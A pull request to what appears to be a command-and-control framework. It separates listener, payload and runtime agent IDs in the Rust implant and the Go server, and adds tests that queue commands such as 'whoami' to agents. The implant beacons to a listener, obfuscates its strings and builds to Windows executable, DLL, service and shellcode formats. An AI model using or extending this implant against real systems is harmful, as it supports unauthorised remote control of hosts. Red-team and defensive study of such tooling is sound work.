### PR TITLE
Separate listener, payload, and agent identities

### DIFF
--- a/agent/build.rs
+++ b/agent/build.rs
@@ -12,6 +12,7 @@ fn main() {
     println!("cargo:rerun-if-changed=config.json");
     println!("cargo:rerun-if-env-changed=LISTENER_HOST");
     println!("cargo:rerun-if-env-changed=LISTENER_PORT");
+    println!("cargo:rerun-if-env-changed=LISTENER_ID");
     println!("cargo:rerun-if-env-changed=SLEEP_INTERVAL");
     println!("cargo:rerun-if-env-changed=PAYLOAD_ID");
     println!("cargo:rerun-if-env-changed=PROTOCOL");
@@ -32,6 +33,7 @@ fn main() {
     // Get configuration from environment variables
     let server_host = env::var("LISTENER_HOST").unwrap_or_default();
     let server_port = env::var("LISTENER_PORT").unwrap_or_default();
+    let listener_id = env::var("LISTENER_ID").unwrap_or_default();
     let sleep_interval = env::var("SLEEP_INTERVAL").unwrap_or_else(|_| "60".to_string());
     let payload_id = env::var("PAYLOAD_ID").unwrap_or_default();
     let protocol = env::var("PROTOCOL").unwrap_or_else(|_| {
@@ -54,6 +56,7 @@ fn main() {
 
     log_build(&format!("LISTENER_HOST: {}", server_host));
     log_build(&format!("LISTENER_PORT: {}", server_port));
+    log_build(&format!("LISTENER_ID: {}", listener_id));
     log_build(&format!("SLEEP_INTERVAL: {}", sleep_interval));
     log_build(&format!("PAYLOAD_ID: {}", payload_id));
     log_build(&format!("PROTOCOL: {}", protocol));
@@ -93,6 +96,8 @@ fn main() {
                 "sleep_interval": {},
                 "jitter": 2,
                 "payload_id": "{}",
+                "agent_id": "",
+                "listener_id": "{}",
                 "protocol": "{}",
                 "socks5_enabled": {},
                 "socks5_host": "{}",
@@ -115,6 +120,7 @@ fn main() {
             server_port,
             sleep_interval,
             payload_id,
+            listener_id,
             protocol,
             socks5_enabled,
             socks5_host,
@@ -146,6 +152,8 @@ fn main() {
             "sleep_interval": 5,
             "jitter": 2,
             "payload_id": "",
+            "agent_id": "",
+            "listener_id": "",
             "protocol": "http",
             "socks5_enabled": false,
             "socks5_host": "127.0.0.1",

--- a/agent/build.sh
+++ b/agent/build.sh
@@ -11,6 +11,7 @@ OUTPUT_DIR="" # Primarily set by --output arg or derived
 BUILD_TYPE="release" # Primarily set by --build-type arg
 LISTENER_HOST="" # Primarily set by --listener-host arg
 LISTENER_PORT="" # Primarily set by --listener-port arg
+LISTENER_ID=${LISTENER_ID:-""}
 PAYLOAD_ID="" # Primarily set by --payload-id arg or derived
 PROTOCOL="" # Primarily set by --protocol arg or derived
 
@@ -283,6 +284,8 @@ CONFIG_JSON_CONTENT=$(cat << EOF
     "sleep_interval": ${SLEEP_INTERVAL},
     "jitter": ${JITTER},
     "payload_id": "${PAYLOAD_ID}",
+    "agent_id": "",
+    "listener_id": "${LISTENER_ID}",
     "protocol": "${PROTOCOL}",
     "socks5_enabled": ${SOCKS5_ENABLED},
     "socks5_host": "${SOCKS5_HOST}",
@@ -385,6 +388,7 @@ fi
 # These ensure build.rs gets the final, resolved values.
 export LISTENER_HOST="$LISTENER_HOST" # Actual host/IP for connection
 export LISTENER_PORT="$LISTENER_PORT" # Actual port
+export LISTENER_ID="$LISTENER_ID"
 export SLEEP_INTERVAL="$SLEEP_INTERVAL"
 export PAYLOAD_ID="$PAYLOAD_ID"
 export PROTOCOL="$PROTOCOL" # Actual protocol

--- a/agent/src/commands/command_shell.rs
+++ b/agent/src/commands/command_shell.rs
@@ -13,7 +13,7 @@ use once_cell::sync::Lazy;
 use os_info;
 use reqwest::{Method, StatusCode, Url};
 use serde::Deserialize;
-use serde_json::json;
+use serde_json::{json, Value};
 use std::collections::HashMap;
 use std::env;
 use std::io;
@@ -232,15 +232,15 @@ pub async fn send_heartbeat_with_client(
     };
     let egress_ip = get_egress_ip(server_addr);
 
-    let data = json!({
-        "id": agent_id,
-        "os": os.os_type().to_string(),
-        "hostname": hostname,
-        "ip": ip,
-        "ip_list": ip_list,
-        "egress_ip": egress_ip,
-        "commands": Vec::<String>::new()
-    });
+    let data = build_heartbeat_payload(
+        config,
+        agent_id,
+        os.os_type().to_string(),
+        hostname,
+        ip,
+        ip_list,
+        egress_ip,
+    );
 
     match client.request(Method::POST, url).json(&data).send().await {
         Ok(response) => {
@@ -264,6 +264,28 @@ pub async fn send_heartbeat_with_client(
             Err(io::Error::new(io::ErrorKind::Other, e))
         }
     }
+}
+
+fn build_heartbeat_payload(
+    config: &AgentConfig,
+    agent_id: &str,
+    os: String,
+    hostname: String,
+    ip: String,
+    ip_list: Vec<String>,
+    egress_ip: String,
+) -> Value {
+    json!({
+        "id": agent_id,
+        "payload_id": config.payload_id,
+        "listener_id": config.listener_id,
+        "os": os,
+        "hostname": hostname,
+        "ip": ip,
+        "ip_list": ip_list,
+        "egress_ip": egress_ip,
+        "commands": Vec::<String>::new()
+    })
 }
 
 // Fetch command from the server
@@ -686,5 +708,29 @@ mod tests {
         assert!(is_strong_command("whoami"));
         assert!(!is_strong_command("downloaded"));
         assert!(!is_strong_command("echo hello"));
+    }
+
+    #[test]
+    fn heartbeat_payload_separates_agent_payload_and_listener_ids() {
+        let config = AgentConfig {
+            payload_id: "payload-one".to_string(),
+            listener_id: "listener-one".to_string(),
+            ..Default::default()
+        };
+
+        let payload = build_heartbeat_payload(
+            &config,
+            "agent-runtime-one",
+            "linux".to_string(),
+            "workstation".to_string(),
+            "127.0.0.1".to_string(),
+            vec!["127.0.0.1".to_string()],
+            "203.0.113.10".to_string(),
+        );
+
+        assert_eq!(payload["id"], "agent-runtime-one");
+        assert_eq!(payload["payload_id"], "payload-one");
+        assert_eq!(payload["listener_id"], "listener-one");
+        assert_ne!(payload["id"], payload["payload_id"]);
     }
 }

--- a/agent/src/config.rs
+++ b/agent/src/config.rs
@@ -81,6 +81,10 @@ pub struct AgentConfig {
     pub sleep_interval: u64,
     pub jitter: u64,
     pub payload_id: String,
+    #[serde(default)]
+    pub agent_id: String,
+    #[serde(default)]
+    pub listener_id: String,
     pub protocol: String,
     #[serde(default)]
     pub socks5_enabled: bool,
@@ -186,6 +190,8 @@ impl Default for AgentConfig {
             sleep_interval: 5,
             jitter: 2,
             payload_id: String::new(),
+            agent_id: String::new(),
+            listener_id: String::new(),
             protocol: obfstr!("http").to_string(),
             socks5_enabled: false,
             socks5_host: obfstr!("127.0.0.1").to_string(),

--- a/agent/src/identity.rs
+++ b/agent/src/identity.rs
@@ -1,0 +1,127 @@
+use crate::config::AgentConfig;
+use std::env;
+use std::fs;
+use std::path::{Path, PathBuf};
+
+const AGENT_ID_FILE: &str = "agent_id";
+
+pub fn resolve_runtime_agent_id(config: &AgentConfig) -> String {
+    if let Some(agent_id) = configured_agent_id(&config.agent_id) {
+        return agent_id;
+    }
+
+    match runtime_identity_dir() {
+        Some(config_dir) => load_or_create_runtime_agent_id(&config_dir, &config.payload_id),
+        None => generate_runtime_agent_id(&config.payload_id),
+    }
+}
+
+pub fn generate_runtime_agent_id(payload_id: &str) -> String {
+    let payload_component = identity_component(payload_id);
+    format!(
+        "agent-{}-{:032x}",
+        payload_component,
+        rand::random::<u128>()
+    )
+}
+
+fn configured_agent_id(agent_id: &str) -> Option<String> {
+    let trimmed = agent_id.trim();
+    if trimmed.is_empty() {
+        None
+    } else {
+        Some(trimmed.to_string())
+    }
+}
+
+fn runtime_identity_dir() -> Option<PathBuf> {
+    match env::current_exe() {
+        Ok(exe_path) => exe_path.parent().map(|parent| parent.join(".config")),
+        Err(_) => None,
+    }
+}
+
+fn load_or_create_runtime_agent_id(config_dir: &Path, payload_id: &str) -> String {
+    let id_path = config_dir.join(AGENT_ID_FILE);
+    if let Some(agent_id) = read_runtime_agent_id(&id_path) {
+        return agent_id;
+    }
+
+    let agent_id = generate_runtime_agent_id(payload_id);
+    if fs::create_dir_all(config_dir).is_ok() {
+        let _ = fs::write(&id_path, agent_id.as_bytes());
+    }
+    agent_id
+}
+
+fn read_runtime_agent_id(id_path: &Path) -> Option<String> {
+    match fs::read_to_string(id_path) {
+        Ok(content) => configured_agent_id(&content),
+        Err(_) => None,
+    }
+}
+
+fn identity_component(raw: &str) -> String {
+    let component: String = raw
+        .chars()
+        .filter(|c| c.is_ascii_alphanumeric())
+        .take(8)
+        .collect();
+    if component.is_empty() {
+        "runtime".to_string()
+    } else {
+        component
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::time::{SystemTime, UNIX_EPOCH};
+
+    #[test]
+    fn generated_agent_ids_are_distinct_from_payload_id() {
+        let payload_id = "payload-one";
+        let first = generate_runtime_agent_id(payload_id);
+        let second = generate_runtime_agent_id(payload_id);
+
+        assert_ne!(first, payload_id);
+        assert_ne!(first, second);
+        assert!(first.starts_with("agent-payloado-"));
+        assert!(first.chars().all(|c| c.is_ascii_alphanumeric() || c == '-'));
+    }
+
+    #[test]
+    fn explicit_agent_id_wins() {
+        let config = AgentConfig {
+            payload_id: "payload-one".to_string(),
+            agent_id: " configured-agent ".to_string(),
+            ..Default::default()
+        };
+
+        assert_eq!(resolve_runtime_agent_id(&config), "configured-agent");
+    }
+
+    #[test]
+    fn runtime_agent_id_is_persisted_in_config_dir() {
+        let config_dir = unique_temp_dir("identity");
+        let first = load_or_create_runtime_agent_id(&config_dir, "payload-one");
+        let second = load_or_create_runtime_agent_id(&config_dir, "payload-one");
+
+        assert_eq!(first, second);
+        assert_ne!(first, "payload-one");
+
+        let id_path = config_dir.join(AGENT_ID_FILE);
+        assert!(id_path.exists());
+        let _ = fs::remove_file(id_path);
+        let _ = fs::remove_dir_all(config_dir);
+    }
+
+    fn unique_temp_dir(name: &str) -> PathBuf {
+        let nanos = match SystemTime::now().duration_since(UNIX_EPOCH) {
+            Ok(duration) => duration.as_nanos(),
+            Err(err) => panic!("read system time: {}", err),
+        };
+        env::temp_dir().join(format!("microc2-{}-{}-{}", std::process::id(), nanos, name))
+    }
+}

--- a/agent/src/lib.rs
+++ b/agent/src/lib.rs
@@ -3,6 +3,7 @@ pub mod config;
 pub mod dormant;
 pub mod file_handling;
 pub mod high_threat_tools;
+pub mod identity;
 pub mod networking;
 pub mod opsec;
 pub mod state;

--- a/agent/src/main.rs
+++ b/agent/src/main.rs
@@ -100,7 +100,8 @@ async fn main() -> Result<(), Box<dyn std::error::Error>> {
         .nth(1)
         .unwrap_or_else(|| config.get_server_url());
 
-    let agent_id = config.payload_id.clone();
+    let agent_id = agent::identity::resolve_runtime_agent_id(&config);
+    info!("[INFO] Payload ID: {}", config.payload_id);
     info!("[INFO] Agent ID: {}", agent_id);
 
     info!("[AGENT] Starting main loop. Agent ID: {}", agent_id);

--- a/server/internal/behaviour/http_polling.go
+++ b/server/internal/behaviour/http_polling.go
@@ -40,13 +40,14 @@ type CommandResult struct {
 }
 
 type Agent struct {
-	ID       string    `json:"id"`
-	OS       string    `json:"os"`
-	Hostname string    `json:"hostname"`
-	IP       string    `json:"ip"`
-	IPList   []string  `json:"ip_list,omitempty"`
-	LastSeen time.Time `json:"last_seen"`
-	Commands []string  `json:"last_commands"`
+	ID        string    `json:"id"`
+	PayloadID string    `json:"payload_id,omitempty"`
+	OS        string    `json:"os"`
+	Hostname  string    `json:"hostname"`
+	IP        string    `json:"ip"`
+	IPList    []string  `json:"ip_list,omitempty"`
+	LastSeen  time.Time `json:"last_seen"`
+	Commands  []string  `json:"last_commands"`
 }
 
 // NewHTTPPollingProtocol creates a new HTTP polling protocol instance
@@ -107,6 +108,11 @@ func (p *HTTPPollingProtocol) handleAgentRequests(w http.ResponseWriter, r *http
 
 	AgentID := parts[3]
 	action := parts[4]
+	if AgentID == "" || action == "" {
+		log.Printf("[ERROR] Invalid request path with empty agent ID or action")
+		http.Error(w, "Invalid request path", http.StatusBadRequest)
+		return
+	}
 
 	// log.Printf("[DEBUG] Handling %s request from agent %s", action, AgentID)
 
@@ -161,7 +167,7 @@ func (p *HTTPPollingProtocol) handleAgentHeartbeat(w http.ResponseWriter, r *htt
 
 	log.Printf("[DEBUG] Received heartbeat data from agent %s: %s", AgentID, string(body))
 
-	if err := p.processAgentHeartbeat(body); err != nil {
+	if err := p.processAgentHeartbeat(body, AgentID); err != nil {
 		log.Printf("[ERROR] Failed to process heartbeat from agent %s: %v", AgentID, err)
 		http.Error(w, fmt.Sprintf("Error processing agent data: %v", err), http.StatusBadRequest)
 		return
@@ -273,11 +279,17 @@ func (p *HTTPPollingProtocol) HandleFileDownload(filename string) (io.Reader, er
 	return os.Open(filepath.Join(p.config.UploadDir, filename))
 }
 
-func (p *HTTPPollingProtocol) processAgentHeartbeat(agentData []byte) error {
+func (p *HTTPPollingProtocol) processAgentHeartbeat(agentData []byte, expectedAgentID string) error {
 	var agent Agent
 	if err := json.Unmarshal(agentData, &agent); err != nil {
 		log.Printf("[ERROR] Failed to unmarshal agent data: %v. Data: %s", err, string(agentData))
 		return fmt.Errorf("failed to unmarshal agent data: %w", err)
+	}
+	if strings.TrimSpace(agent.ID) == "" {
+		return fmt.Errorf("agent id is required")
+	}
+	if expectedAgentID != "" && agent.ID != expectedAgentID {
+		return fmt.Errorf("agent id mismatch: path %q, body %q", expectedAgentID, agent.ID)
 	}
 
 	p.agents.Lock()
@@ -290,7 +302,7 @@ func (p *HTTPPollingProtocol) processAgentHeartbeat(agentData []byte) error {
 
 // Restore the interface method for Protocol compatibility
 func (p *HTTPPollingProtocol) HandleAgentHeartbeat(agentData []byte) error {
-	return p.processAgentHeartbeat(agentData)
+	return p.processAgentHeartbeat(agentData, "")
 }
 
 // Remove handleSubmitResult from GetRoutes, as it no longer exists or is needed.

--- a/server/internal/behaviour/http_polling.go
+++ b/server/internal/behaviour/http_polling.go
@@ -165,8 +165,6 @@ func (p *HTTPPollingProtocol) handleAgentHeartbeat(w http.ResponseWriter, r *htt
 		return
 	}
 
-	log.Printf("[DEBUG] Received heartbeat data from agent %s: %s", AgentID, string(body))
-
 	if err := p.processAgentHeartbeat(body, AgentID); err != nil {
 		log.Printf("[ERROR] Failed to process heartbeat from agent %s: %v", AgentID, err)
 		http.Error(w, fmt.Sprintf("Error processing agent data: %v", err), http.StatusBadRequest)

--- a/server/internal/behaviour/http_polling_test.go
+++ b/server/internal/behaviour/http_polling_test.go
@@ -92,6 +92,77 @@ func TestHTTPPollingProtocolAgentLifecycle(t *testing.T) {
 	}
 }
 
+func TestHTTPPollingProtocolIsolatesMultipleAgentsPerListener(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{
+		UploadDir: t.TempDir(),
+		Port:      "0",
+	})
+	handler := proto.GetHTTPHandler()
+
+	for _, agentID := range []string{"agent-one", "agent-two"} {
+		heartbeatBody, err := json.Marshal(map[string]interface{}{
+			"id":         agentID,
+			"payload_id": "payload-shared",
+			"os":         "linux",
+			"hostname":   agentID + "-host",
+			"ip":         "127.0.0.1",
+		})
+		if err != nil {
+			t.Fatalf("marshal heartbeat for %s: %v", agentID, err)
+		}
+		rec := httptest.NewRecorder()
+		req := httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/heartbeat", bytes.NewReader(heartbeatBody))
+		handler.ServeHTTP(rec, req)
+		if rec.Code != http.StatusOK {
+			t.Fatalf("expected heartbeat 200 for %s, got %d: %s", agentID, rec.Code, rec.Body.String())
+		}
+	}
+
+	agents := proto.GetAllAgents()
+	if len(agents) != 2 {
+		t.Fatalf("expected two distinct agents, got %#v", agents)
+	}
+
+	proto.QueueCommand("agent-one", "whoami")
+	proto.QueueCommand("agent-two", "pwd")
+	assertNextListenerCommand(t, handler, "agent-one", "whoami")
+	assertNextListenerCommand(t, handler, "agent-two", "pwd")
+	assertNoListenerCommand(t, handler, "agent-one")
+	assertNoListenerCommand(t, handler, "agent-two")
+
+	postListenerResult(t, handler, "agent-one", "whoami", xorHex("one\n", "agent-one"))
+	postListenerResult(t, handler, "agent-two", "pwd", xorHex("two\n", "agent-two"))
+
+	agentOneResults := proto.GetResults("agent-one")
+	agentTwoResults := proto.GetResults("agent-two")
+	if len(agentOneResults) != 1 || agentOneResults[0]["output"] != "one\n" {
+		t.Fatalf("unexpected agent-one results: %#v", agentOneResults)
+	}
+	if len(agentTwoResults) != 1 || agentTwoResults[0]["output"] != "two\n" {
+		t.Fatalf("unexpected agent-two results: %#v", agentTwoResults)
+	}
+}
+
+func TestHTTPPollingProtocolRejectsHeartbeatIDMismatch(t *testing.T) {
+	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{
+		UploadDir: t.TempDir(),
+		Port:      "0",
+	})
+	handler := proto.GetHTTPHandler()
+	heartbeatBody := []byte(`{"id":"body-agent","os":"linux","hostname":"host","ip":"127.0.0.1"}`)
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodPost, "/api/agent/path-agent/heartbeat", bytes.NewReader(heartbeatBody))
+	handler.ServeHTTP(rec, req)
+
+	if rec.Code != http.StatusBadRequest {
+		t.Fatalf("expected mismatch heartbeat 400, got %d: %s", rec.Code, rec.Body.String())
+	}
+	if len(proto.GetAllAgents()) != 0 {
+		t.Fatalf("mismatched heartbeat should not register an agent: %#v", proto.GetAllAgents())
+	}
+}
+
 func TestHTTPPollingProtocolRejectsMalformedAndOperatorRoutes(t *testing.T) {
 	proto := NewHTTPPollingProtocol(common.BaseProtocolConfig{
 		UploadDir: t.TempDir(),
@@ -153,4 +224,51 @@ func xorHex(data, key string) string {
 		out[i] = b ^ keyBytes[i%len(keyBytes)]
 	}
 	return hex.EncodeToString(out)
+}
+
+func assertNextListenerCommand(t *testing.T, handler http.Handler, agentID, want string) {
+	t.Helper()
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/command", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected command 200 for %s, got %d: %s", agentID, rec.Code, rec.Body.String())
+	}
+	var response map[string]string
+	if err := json.Unmarshal(rec.Body.Bytes(), &response); err != nil {
+		t.Fatalf("decode command response: %v", err)
+	}
+	if response["command"] != want {
+		t.Fatalf("expected command %q for %s, got %q", want, agentID, response["command"])
+	}
+}
+
+func assertNoListenerCommand(t *testing.T, handler http.Handler, agentID string) {
+	t.Helper()
+
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodGet, "/api/agent/"+agentID+"/command", nil)
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusNoContent {
+		t.Fatalf("expected no command 204 for %s, got %d: %s", agentID, rec.Code, rec.Body.String())
+	}
+}
+
+func postListenerResult(t *testing.T, handler http.Handler, agentID, command, output string) {
+	t.Helper()
+
+	body, err := json.Marshal(map[string]string{
+		"command": command,
+		"output":  output,
+	})
+	if err != nil {
+		t.Fatalf("marshal result: %v", err)
+	}
+	rec := httptest.NewRecorder()
+	req := httptest.NewRequest(http.MethodPost, "/api/agent/"+agentID+"/result", bytes.NewReader(body))
+	handler.ServeHTTP(rec, req)
+	if rec.Code != http.StatusOK {
+		t.Fatalf("expected result post 200 for %s, got %d: %s", agentID, rec.Code, rec.Body.String())
+	}
 }

--- a/server/internal/handlers/api/api_handler.go
+++ b/server/internal/handlers/api/api_handler.go
@@ -31,18 +31,22 @@ func (h *APIHandler) HandleRequest(w http.ResponseWriter, r *http.Request) {
 
 	// Handle POST /api/agents/{AgentID}/command
 	if r.Method == http.MethodPost && strings.HasPrefix(r.URL.Path, "/api/agents/") && strings.HasSuffix(r.URL.Path, "/command") {
-		trimmed := strings.TrimPrefix(r.URL.Path, "/api/agents/")
-		AgentID := strings.TrimSuffix(trimmed, "/command")
-		AgentID = strings.TrimSuffix(AgentID, "/") // Remove trailing slash if present
+		AgentID, ok := parseAgentPathID(r.URL.Path, "/api/agents/", "/command")
+		if !ok {
+			http.Error(w, "Invalid agent ID", http.StatusBadRequest)
+			return
+		}
 		h.handleQueueAgentCommand(w, r, AgentID)
 		return
 	}
 
 	// Add GET /api/agents/{AgentID}/results endpoint
 	if r.Method == http.MethodGet && strings.HasPrefix(r.URL.Path, "/api/agents/") && strings.HasSuffix(r.URL.Path, "/results") {
-		trimmed := strings.TrimPrefix(r.URL.Path, "/api/agents/")
-		AgentID := strings.TrimSuffix(trimmed, "/results")
-		AgentID = strings.TrimSuffix(AgentID, "/")
+		AgentID, ok := parseAgentPathID(r.URL.Path, "/api/agents/", "/results")
+		if !ok {
+			http.Error(w, "Invalid agent ID", http.StatusBadRequest)
+			return
+		}
 		h.handleGetAgentResults(w, AgentID)
 		return
 	}
@@ -51,6 +55,16 @@ func (h *APIHandler) HandleRequest(w http.ResponseWriter, r *http.Request) {
 	w.Header().Set("Content-Type", "application/json")
 	w.WriteHeader(http.StatusNotFound)
 	w.Write([]byte(`{"error":"unknown operator API route"}`))
+}
+
+func parseAgentPathID(path, prefix, suffix string) (string, bool) {
+	trimmed := strings.TrimPrefix(path, prefix)
+	agentID := strings.TrimSuffix(trimmed, suffix)
+	agentID = strings.TrimSuffix(agentID, "/")
+	if agentID == "" || strings.Contains(agentID, "/") {
+		return "", false
+	}
+	return agentID, true
 }
 
 func (h *APIHandler) handleListAgents(w http.ResponseWriter, r *http.Request) {

--- a/server/internal/handlers/api/api_handler_test.go
+++ b/server/internal/handlers/api/api_handler_test.go
@@ -124,6 +124,20 @@ func TestOperatorAPIRejectsInvalidCommandRequests(t *testing.T) {
 			wantStatus: http.StatusBadRequest,
 		},
 		{
+			name:       "path route rejects empty agent id",
+			method:     http.MethodPost,
+			path:       "/api/agents//command",
+			body:       map[string]string{"command": "whoami"},
+			wantStatus: http.StatusBadRequest,
+		},
+		{
+			name:       "path route rejects malformed agent id",
+			method:     http.MethodPost,
+			path:       "/api/agents/agent-one/extra/command",
+			body:       map[string]string{"command": "whoami"},
+			wantStatus: http.StatusBadRequest,
+		},
+		{
 			name:       "unknown agent cannot be queued",
 			method:     http.MethodPost,
 			path:       "/api/agents/missing/command",

--- a/server/internal/handlers/api/payload/payload_handler.go
+++ b/server/internal/handlers/api/payload/payload_handler.go
@@ -11,6 +11,8 @@ import (
 	"path/filepath"
 	"strings"
 	"time"
+
+	"github.com/google/uuid"
 )
 
 // NewPayloadHandler creates a new payload handler
@@ -161,9 +163,8 @@ func (h *PayloadHandler) GeneratePayload(config PayloadConfig) (PayloadResult, e
 	}
 	log.Printf("[INFO] Using listener: %s (%s) at %s:%d", listener.Name, listener.Protocol, listener.BindHost, listener.Port)
 
-	// Use listener ID for the payload
-	payloadID := listener.ID
-	log.Printf("[INFO] Using listener ID as payload ID: %s", payloadID)
+	payloadID := uuid.NewString()
+	log.Printf("[INFO] Generated payload build ID %s for listener %s", payloadID, listener.ID)
 
 	// Determine build type (debug or release)
 	buildType := "release"
@@ -201,8 +202,10 @@ func (h *PayloadHandler) GeneratePayload(config PayloadConfig) (PayloadResult, e
 	agentConfig := map[string]interface{}{
 		"server_url":     serverUrl,
 		"sleep_interval": config.Sleep,
-		"jitter":         2,           // Default jitter value
-		"payload_id":     listener.ID, // Use listener ID as payload ID
+		"jitter":         2, // Default jitter value
+		"payload_id":     payloadID,
+		"agent_id":       "",
+		"listener_id":    listener.ID,
 		"protocol":       listener.Protocol,
 	}
 
@@ -328,6 +331,7 @@ func (h *PayloadHandler) GeneratePayload(config PayloadConfig) (PayloadResult, e
 		fmt.Sprintf("PROTOCOL=%s", listener.Protocol),
 		fmt.Sprintf("LISTENER_HOST=%s", connectHost),
 		fmt.Sprintf("LISTENER_PORT=%d", listener.Port),
+		fmt.Sprintf("LISTENER_ID=%s", listener.ID),
 		fmt.Sprintf("SLEEP_INTERVAL=%d", config.Sleep),
 		fmt.Sprintf("SOCKS5_ENABLED=%t", config.Socks5Enabled),
 		fmt.Sprintf("SOCKS5_HOST=%s", config.Socks5Host),
@@ -452,11 +456,13 @@ func (h *PayloadHandler) GeneratePayload(config PayloadConfig) (PayloadResult, e
 
 	// Create the result
 	result := PayloadResult{
-		ID:       payloadID,
-		Filename: payloadFileName,
-		Path:     payloadPath,
-		Size:     fileInfo.Size(),
-		Created:  time.Now().Format(time.RFC3339),
+		ID:         payloadID,
+		PayloadID:  payloadID,
+		ListenerID: listener.ID,
+		Filename:   payloadFileName,
+		Path:       payloadPath,
+		Size:       fileInfo.Size(),
+		Created:    time.Now().Format(time.RFC3339),
 	}
 
 	log.Printf("[INFO] Successfully generated payload: %s (%s, %d bytes)",

--- a/server/internal/handlers/api/payload/payload_handler_test.go
+++ b/server/internal/handlers/api/payload/payload_handler_test.go
@@ -1,0 +1,168 @@
+package payload
+
+import (
+	"encoding/json"
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestGeneratePayloadCreatesBuildIDsDistinctFromListenerID(t *testing.T) {
+	tempDir := withTempWorkingDir(t)
+	agentDir := filepath.Join(tempDir, "agent")
+	writeFakeBuildScript(t, agentDir)
+	writeListenerConfig(t, ListenerConfig{
+		ID:       "listener-one",
+		Name:     "lab-listener",
+		Protocol: "http",
+		BindHost: "127.0.0.1",
+		Port:     9001,
+	})
+
+	handler := NewPayloadHandler(filepath.Join(tempDir, "static", "payloads"), agentDir)
+	config := PayloadConfig{
+		ListenerID: "listener-one",
+		AgentType:  "debugAgent",
+		Format:     "linux_elf",
+		Sleep:      5,
+	}
+
+	first, err := handler.GeneratePayload(config)
+	if err != nil {
+		t.Fatalf("generate first payload: %v", err)
+	}
+	second, err := handler.GeneratePayload(config)
+	if err != nil {
+		t.Fatalf("generate second payload: %v", err)
+	}
+
+	if first.ID == "listener-one" || second.ID == "listener-one" {
+		t.Fatalf("payload ID must not reuse listener ID: first=%q second=%q", first.ID, second.ID)
+	}
+	if first.ID == second.ID {
+		t.Fatalf("payload builds from one listener should get distinct IDs: %q", first.ID)
+	}
+	if filepath.Dir(first.Path) == filepath.Dir(second.Path) {
+		t.Fatalf("payload builds should use distinct output dirs: %q", filepath.Dir(first.Path))
+	}
+	if first.PayloadID != first.ID || second.PayloadID != second.ID {
+		t.Fatalf("payload result should expose payload ID consistently: first=%+v second=%+v", first, second)
+	}
+	if first.ListenerID != "listener-one" || second.ListenerID != "listener-one" {
+		t.Fatalf("payload result should retain listener traceability: first=%+v second=%+v", first, second)
+	}
+
+	configPath := filepath.Join(filepath.Dir(first.Path), "config.json")
+	configData := readJSONFile(t, configPath)
+	if configData["payload_id"] == "listener-one" {
+		t.Fatalf("generated config reused listener ID as payload ID: %#v", configData)
+	}
+	if configData["payload_id"] != first.ID {
+		t.Fatalf("generated config payload_id = %#v, want %q", configData["payload_id"], first.ID)
+	}
+	if configData["listener_id"] != "listener-one" {
+		t.Fatalf("generated config listener_id = %#v, want listener-one", configData["listener_id"])
+	}
+	if configData["agent_id"] != "" {
+		t.Fatalf("generated config should leave runtime agent_id empty, got %#v", configData["agent_id"])
+	}
+}
+
+func withTempWorkingDir(t *testing.T) string {
+	t.Helper()
+
+	tempDir := t.TempDir()
+	oldCwd, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("get cwd: %v", err)
+	}
+	if err := os.Chdir(tempDir); err != nil {
+		t.Fatalf("switch to temp cwd: %v", err)
+	}
+	t.Cleanup(func() {
+		if err := os.Chdir(oldCwd); err != nil {
+			t.Fatalf("restore cwd: %v", err)
+		}
+	})
+	return tempDir
+}
+
+func writeListenerConfig(t *testing.T, config ListenerConfig) {
+	t.Helper()
+
+	listenerDir := filepath.Join("static", "listeners", config.Name)
+	if err := os.MkdirAll(listenerDir, 0755); err != nil {
+		t.Fatalf("create listener dir: %v", err)
+	}
+	configBytes, err := json.Marshal(config)
+	if err != nil {
+		t.Fatalf("marshal listener config: %v", err)
+	}
+	if err := os.WriteFile(filepath.Join(listenerDir, "config.json"), configBytes, 0644); err != nil {
+		t.Fatalf("write listener config: %v", err)
+	}
+}
+
+func writeFakeBuildScript(t *testing.T, agentDir string) {
+	t.Helper()
+
+	if err := os.MkdirAll(agentDir, 0755); err != nil {
+		t.Fatalf("create fake agent dir: %v", err)
+	}
+	script := `#!/bin/bash
+set -e
+output=""
+format="linux_elf"
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    --output)
+      output="$2"
+      shift 2
+      ;;
+    --format)
+      format="$2"
+      shift 2
+      ;;
+    *)
+      shift
+      ;;
+  esac
+done
+case "$format" in
+  windows_exe)
+    artifact="agent.exe"
+    ;;
+  windows_dll)
+    artifact="agent.dll"
+    ;;
+  windows_service)
+    artifact="agent_service.exe"
+    ;;
+  windows_shellcode)
+    artifact="shellcode.bin"
+    ;;
+  *)
+    artifact="agent"
+    ;;
+esac
+mkdir -p "$output"
+printf 'fake agent' > "$output/$artifact"
+`
+	if err := os.WriteFile(filepath.Join(agentDir, "build.sh"), []byte(script), 0644); err != nil {
+		t.Fatalf("write fake build script: %v", err)
+	}
+}
+
+func readJSONFile(t *testing.T, path string) map[string]interface{} {
+	t.Helper()
+
+	content, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("read json file %s: %v", path, err)
+	}
+	var data map[string]interface{}
+	if err := json.Unmarshal(content, &data); err != nil {
+		t.Fatalf("decode json file %s: %v", path, err)
+	}
+	return data
+}

--- a/server/internal/handlers/api/payload/types.go
+++ b/server/internal/handlers/api/payload/types.go
@@ -37,11 +37,13 @@ type PayloadConfig struct {
 
 // PayloadResult contains information about a generated payload
 type PayloadResult struct {
-	ID       string `json:"id"`
-	Filename string `json:"filename"`
-	Path     string `json:"path"`
-	Size     int64  `json:"size"`
-	Created  string `json:"created"`
+	ID         string `json:"id"`
+	PayloadID  string `json:"payload_id,omitempty"`
+	ListenerID string `json:"listener_id,omitempty"`
+	Filename   string `json:"filename"`
+	Path       string `json:"path"`
+	Size       int64  `json:"size"`
+	Created    string `json:"created"`
 }
 
 // TLSConfig holds TLS configuration for secure listeners


### PR DESCRIPTION
Closes #64

## Summary
- generate fresh payload/build IDs instead of reusing the selected listener ID
